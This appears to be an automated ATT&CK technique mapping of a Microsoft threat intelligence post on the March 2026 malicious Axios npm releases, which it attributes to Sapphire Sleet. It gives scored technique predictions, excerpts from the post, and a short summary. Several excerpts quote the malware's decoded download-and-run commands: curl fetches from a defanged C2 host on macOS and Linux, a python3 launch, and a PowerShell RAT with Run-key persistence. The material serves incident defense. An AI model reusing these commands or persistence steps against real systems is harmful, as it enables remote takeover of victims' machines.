
Microsoft Threat Intelligence

Mitigating the Axios npm supply chain compromise

Microsoft Threat Intelligence and Microsoft Defender Security Research Team · 2026-04-01

ATT&CK techniques detected

29 predictions

T1071.001 Web Protocols (99%)
Excerpt: …Information Model (ASIM) functions to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually. Detect network IP and domain indicators of compromi…

T1195.001 Compromise Software Dependencies and Development Tools (98%)
Excerpt: …fraudulent meeting links that impersonate legitimate video conferencing applications, such as Zoom. Sapphire Sleet overlaps with activity tracked by other security vendors as UNC1069, Stardust Chollima, Alluring Pisces, BlueNoroff, CageyChameleon, or CryptoCore. Mitigation and pr…

T1059.001 PowerShell (98%)
Excerpt: ….act.mond && /bin/zsh -c "/Library/Caches/com.apple.act.mond hxxp://sfrclak[.]com:8000/6202033 &" &> /dev/null' Windows: On Windows, the RAT is identified as a PowerShell: 6202033.ps1. SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a63…

T1195.001 Compromise Software Dependencies and Development Tools (98%)
Excerpt: …credentials immediately and downgrade to a safe version (1.14.0 or 0.30.3). Users should also follow the mitigation and protection guidance provided in this blog, including disabling auto-updates for Axios npm packages, since the malicious payload includes a hook that wil…

T1204.002 Malicious File (97%)
Excerpt: …]com:8000/6202033), and the OS selection is conveyed through POST bodies packages.npm.org/product0|product1|product2. This enables the operator to serve platform-specific payloads from one route while keeping the client-side logic minimal. On Windows, the malici…

T1071.001 Web Protocols (97%)
Excerpt: …ize imNWS_mintime = min(TimeGenerated), imNWS_maxtime = max(TimeGenerated), EventCount = count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor. Detect web sessions IP and domain indicators of compromise using ASIM: The following query checks IP ad…

T1059.001 PowerShell (97%)
Excerpt: …hell RAT creates %ProgramData%\system.bat and adds a registry Run key at HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate to enable re-fetching of RAT after every reboot. This added registry Run key can persist after reboot. SHA-256: f7…

T1195.001 Compromise Software Dependencies and Development Tools (96%)
Excerpt: Mitigating the Axios npm supply chain compromise: On March 31, 2026, two new npm packages for updated versions of Axios, a popular HTTP client for JavaScript that simplifies making HTTP requests to a REST endpoint with over 70 million weekly downloads, were identified as malicious…

T1195.001 Compromise Software Dependencies and Development Tools (96%)
Excerpt: …cache clean --force". Disable or restrict automated dependency bots for critical packages. Adopt trusted publishing with OIDC to eliminate stored credentials. Review your CI/CD pipeline logs for any npm install executions that might have updated to axios@1.14.1 or axios@…

T1059.001 PowerShell (96%)
Excerpt: …, leaving behind a clean-looking manifest to reduce the chance that post-incident inspection of node_modules reveals the original install hook. RAT deployment as covert remote management: The Windows RAT is a PowerShell script that functions as a covert remote management com…

T1195.001 Compromise Software Dependencies and Development Tools (91%)
Excerpt: …sable automated dependency bots (such as Dependabot or Renovate) by disabling or restricting Axios updates in their config to prevent PR-based auto-updates, which are often mistaken for npm behavior: # Dependabot example ignore: - dependency-name: "axios" Check for…

T1195.001 Compromise Software Dependencies and Development Tools (89%)
Excerpt: …a follow-up release adds the malicious install-time logic (plain-crypto-js@4.2.1), introducing an install hook that runs node setup.js and includes a clean manifest stub (package.md) intended for later replacement. Two Axios releases are then published with a su…

T1059.004 Unix Shell (89%)
Excerpt: …a binary to /Library/Caches/com.apple.act.mond, applies chmod 770, then starts it using /bin/zsh in the background. node setup.js sh -c 'curl -o /Library/Caches/com.apple.act.mond The AppleScript is removed afterward; the durable artifact is typically Libr…

T1587 Develop Capabilities (86%)
Excerpt: same as the T1195.001 (98%) "credentials immediately…" entry above.

T1059.006 Python (83%)
Excerpt: …" & del "C:\Users\\AppData\Local\Temp\6202033.ps1" /f Linux/others: On Linux, the RAT is identified as a Python payload: ld.py. SHA-256: fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf. A Python payload is written to /tmp/ld.py and launch…

T1587 Develop Capabilities (83%)
Excerpt: same as the T1195.001 (96%) "Mitigating the Axios npm supply chain compromise…" entry above.

T1195.001 Compromise Software Dependencies and Development Tools (69%)
Excerpt: …assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs. Learn more: For the latest security research from the Microsoft Threat Intelligence community, chec…

T1195.001 Compromise Software Dependencies and Development Tools (67%)
Excerpt: …-stage malware. Windows, macOS, and Linux systems are all targeted with platform-specific payloads. Microsoft Threat Intelligence has determined the account that created the plain-crypto-js package is associated with Sapphire Sleet infrastructure. That account has been dis…

T1195.002 Compromise Software Supply Chain (59%)
Excerpt: same as the T1195.001 (67%) "-stage malware…" entry above.

T1587 Develop Capabilities (53%)
Excerpt: same as the T1195.001 (98%) "fraudulent meeting links…" entry above.

T1195.001 Compromise Software Dependencies and Development Tools (52%)
Excerpt: …set ignore-scripts true". Remove all Axios files/code from the victim systems and re-install cleanly. Defending against the Axios supply chain attack: Microsoft Threat Intelligence recommends the following mitigation measures to protect organizations against this threat. Fu…

T1059.004 Unix Shell (50%)
Excerpt: …using nohup python3 /tmp/ld.py hxxp://sfrclak[.]com:8000/6202033 … &. /tmp/ld.py remains a key on-disk indicator in typical flows. Observed Linux/Unix command (as decoded): /bin/sh -c "curl -o /tmp/ld.py -d packages.npm.org/product2 -s hx…

T1587 Develop Capabilities (49%)
Excerpt: same as the T1195.001 (91%) "…sable automated dependency bots…" entry above.

T1204.002 Malicious File (48%)
Excerpt: …query patterns are available here as well as in the hunting queries section. Microsoft Defender detections: Microsoft Defender customers can refer to the list of applicable detections below. Durable detections that were already in place alerted and protected customers from this at…

T1547.001 Registry Run Keys / Startup Folder (42%)
Excerpt: same as the T1059.001 (98%) "….act.mond && /bin/zsh…" entry above.

T1036.003 Rename Legitimate Utilities (38%)
Excerpt: same as the T1059.001 (97%) "…hell RAT creates %ProgramData%\system.bat…" entry above.

T1657 Financial Theft (36%)
Excerpt: …64-encoded payloads, enabling flexible control of the compromised system while minimizing on-disk artifacts. Who is Sapphire Sleet? Sapphire Sleet is a North Korean state actor that has been active since at least March 2020. The threat actor focuses primarily on the finance…

T1105 Ingress Tool Transfer (34%)
Excerpt: …the affected versions). The package manager resolves and installs the injected dependency (plain-crypto-js@4.2.1). During installation, the dependency's lifecycle script automatically launches node setup.js (no additional user step required), which decodes embedde…

T1547.001 Registry Run Keys / Startup Folder (31%)
Excerpt: same as the T1059.001 (97%) "…hell RAT creates %ProgramData%\system.bat…" entry above.

Summary

On March 31, 2026, the popular HTTP client Axios experienced a supply chain attack: two newly published npm packages, presented as version updates, downloaded payloads from command and control (C2) infrastructure that Microsoft Threat Intelligence has attributed to the North Korean state actor Sapphire Sleet. Although the malicious versions are no longer available for download, Axios is one of the most widely used HTTP clients in the JavaScript ecosystem, so this compromise exposed anywhere from hundreds to potentially millions of users.

The post Mitigating the Axios npm supply chain compromise appeared first on Microsoft Security Blog.